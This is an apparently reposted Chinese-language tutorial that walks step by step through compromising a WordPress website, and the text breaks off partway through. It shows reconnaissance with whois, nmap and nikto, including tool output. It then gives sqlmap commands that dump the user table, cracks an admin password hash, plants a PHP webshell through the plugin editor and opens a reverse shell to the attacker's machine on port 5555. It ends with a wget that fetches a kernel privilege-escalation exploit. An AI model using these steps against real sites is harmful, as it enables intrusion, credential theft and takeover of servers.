您好,欢迎访问三七文档
简单的来说,入侵一个网站可以有很多种方法。本文的目的是展示黑客们常用的扫描和入侵网站的技术。假设你的站点是:hack-test.com让我们来ping一下这个服务器:我们得到了一个IP地址:173.236.138.113–这是我们目标服务器的IP地址。Sameip.org可以帮助我们找到其他与这个服务器绑定的域名:SameIP26siteshostedonIPAddress173.236.138.113有26个站点在这台服务器上(173.236.138.113)。许多黑客会选择攻击在同服务器上的不同站点从而入侵到你的网站。但是出于为了学习目的,我们只选择入侵你的服务器。我们需要从你的站点得到一下信息:1.DNS记录(A,NS,TXT,MX和SOA)2.网站服务器的类型(Apache,IIS,Tomcat)3.域名的注册信息(哪个公司拥有这个域名)4.你的名字,地址,EMAIL和电话5.你的网站上所运行的脚本类型(PHP,ASP,ASP.NET,JSP,CFM)6.服务器的操作系统类型(Unix,Linux,Windows,Solaris)7.服务器对外开放的端口(80,443,21,等)现在让我们来寻找网站的DNS记录。选择网站“Who.is”来实现这个目标。我们发现站点上的DNS记录有:让我们来检测一下网站服务器的类型:我们可以看到,网站服务器用的是Apache.稍后我们会检测Apache的版本。HACK-TEST.COMSITEINFORMATIONIP:173.236.138.113WebsiteStatus:activeServerType:ApacheAlexaTrend/Rank:1Month:3,213,9683Month:2,161,753PageViewsperVisit:1Month:2.03Month:3.7接下来我们来寻找一下域名的注册信息:我们得到了注册者以及其他重要的信息。我们可以用Whatweb来检测你的站点使用的是什么脚本语言以及操作系统类型和网站服务器的版本。我们可以看到,网站使用的是WordPress,操作系统类型是FedoraLinux,网站服务器版本是Apache2.2.15,下面我们来检测一下服务器上打开的端口:我们使用Nmap:1.检测服务器上运行着哪些服务:root@bt:/#nmap-sVhack-test.comStartingNmap5.59BETA1()at2011-12-2806:39EETNmapscanreportforhack-test.com(192.168.1.2)Hostisup(0.0013slatency).Notshown:998filteredportsPORTSTATESERVICEVERSION22/tcpclosedssh80/tcpopenhttpApachehttpd2.2.15((Fedora))MACAddress:00:0C:29:01:8A:4D(VMware)Servicedetectionperformed.Pleasereportanyincorrectresultsat:1IPaddress(1hostup)scannedin11.56seconds2.检测服务器的OSroot@bt:/#nmap-Ohack-test.comStartingNmap5.59BETA1()at2011-12-2806:40EETNmapscanreportforhack-test.com(192.168.1.2)Hostisup(0.00079slatency).Notshown:998filteredportsPORTSTATESERVICE22/tcpclosedssh80/tcpopenhttpMACAddress:00:0C:29:01:8A:4D(VMware)Devicetype:generalpurposeRunning:Linux2.6.XOSdetails:Linux2.6.22(FedoraCore6)NetworkDistance:1hopOSdetectionperformed.Pleasereportanyincorrectresultsat:1IPaddress(1hostup)scannedin7.42seconds服务器只开放了80端口,操作系统是Linux2.6.22(FedoraCore6)现在我们已经得到了所有重要的信息,接下来我们来做一下弱点测试,例如:sql注入,盲注,LFI,RFI,XSS,CSRF,等。我们用Nikto.pl来获取信息以及弱点:root@bt:/pentest/web/nikto#perlnikto.pl-h:192.168.1.2+TargetHostname:hack-test.com+TargetPort:80+StartTime:2011-12-2906:50:03---------------------------------------------------------------------------+Server:Apache/2.2.15(Fedora)+ETagheaderfoundonserver,inode:12748,size:1475,mtime:0x4996d177f5c3b+Apache/2.2.15appearstobeoutdated(currentisatleastApache/2.2.17).Apache1.3.42(finalrelease)and2.0.64arealsocurrent.+AllowedHTTPMethods:GET,HEAD,POST,OPTIONS,TRACE+OSVDB-877:HTTPTRACEmethodisactive,suggestingthehostisvulnerabletoXST+OSVDB-3268:/icons/:Directoryindexingfound.+OSVDB-3233:/icons/README:Apachedefaultfilefound.+6448itemschecked:1error(s)and6item(s)reportedonremotehost+EndTime:2011-12-2906:50:37(34seconds)---------------------------------------------------------------------------+1host(s)tested也可以使用W3AF,这个工具可以在Backtrack5R1中找到root@bt:/pentest/web/w3af#./w3af_guiStartingw3af,runningon:Pythonversion:2.6.5(r265:79063,Apr162010,13:57:41)[GCC4.4.3]GTKversion:2.20.1PyGTKversion:2.17.0w3af-WebApplicationAttackandAuditFrameworkVersion:1.2Revision:4605Author:AndresRianchoandthew3afteam.我们可以插入URL,选择fullaudit选项:稍等片刻,结果就会出现。网站存在着sql注入漏洞以及其他的漏洞。让我们来深入一下sql注入:=d%27z%220这个地址就是注入点,我们用sqlmap然后dump所有入侵所需要用到的数据库信息sqlmap–uurl稍等片刻:选择“n”继续:网站的sql注入类型是error-basedMysql数据库的版本是5.加上参数“-dbs”可以找出所有的数据库:我们发现了3个数据库:用dump–Dwordpress-tables导出wordpress数据库表我们需要导出“wp_users”表来得到用户信息以及密码的hash,之后我们就可以尝试着去破解密码最终登陆到wordpress的后台。使用参数“-Twp_users–columns“找到了22列的数据:使用参数-Cuser_login,user_pass–dump来导出列。之后我们就得到了账号密码。接来使用这个网站来把MD5转换成明文密码(并不是所有HASH都能成功转换)““明文密码是:q1w2e3用户名“GeorgeMiller”让我们来登陆wordpress的后台:现在我们来试着上传一个phpwebshell用来在这台服务器上执行一些linux命令编辑wordpress的“Textile”插件编辑它插入一个phpwebshell来代替一个真正的插件。之后点击上传,phpwebshell就被成功上传到服务器上了。现在,PHPWEBSHELL就成功运行了。现在就可以浏览网站里所有的文件了,但是我们想得到服务器的root权限然后入侵其他的站点。选择在phpwebshell里的“back-connect“然后连接到我们的ip“192.168.1.6″端口“5555″在我们点击连接之前,我们先得在本机上监听一个“5555”的端口点击连接,我们会得到这样一个窗口:我们来试一下linux的命令iduid=48(apache)gid=489(apache)groups=489(apache)pwd/var/:41:45EST2009i686i686i386GNU/LinuxID命令用来告诉我们用户ID和用户组Pwd命令能告诉我们现在所在的路径uname–a命令用来得到一些信息以及内核版本好了,我们现在知道服务器的内核版本是2.6.31.5-127.fc12.1686Ok,nowweknewthatserverkernelversionis2.6.31.5-127.fc12.1686我们可以在exploit-db.com找到针对这个版本的exploit输入:“kernel2.6.31“以上结果没有合适的,因为他们都不是用来提权的。下一个,就是它了!复制这个连接在netcatshell里输入:wget:48:01--|199.27.135.111|:80...connected.HTTPrequestsent,awaitingresponse...301MovedPermanentlyLocation:[fol
本文标题:黑客攻防教程
链接地址:https://www.777doc.com/doc-4893748 .html